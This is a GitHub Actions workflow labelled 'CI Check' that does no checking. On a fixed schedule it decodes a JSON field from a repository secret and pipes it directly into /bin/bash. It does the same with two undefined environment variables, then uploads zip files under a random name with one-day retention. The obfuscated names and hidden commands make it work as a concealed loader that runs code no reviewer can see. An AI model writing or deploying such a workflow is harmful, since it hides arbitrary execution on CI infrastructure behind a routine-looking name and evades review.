name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '29 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          scas7: ${{ secrets.scas7 }}
        run: |
          printf '%s' "$scas7" | jq -r .cg21 | /bin/bash
          echo $tiyer1201 | jq -r .nh71 | /bin/bash
          echo $eyvld71 | jq -r .ikgqc0490 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: MXFb0BXQ
          path: "*.zip"
          retention-days: 1
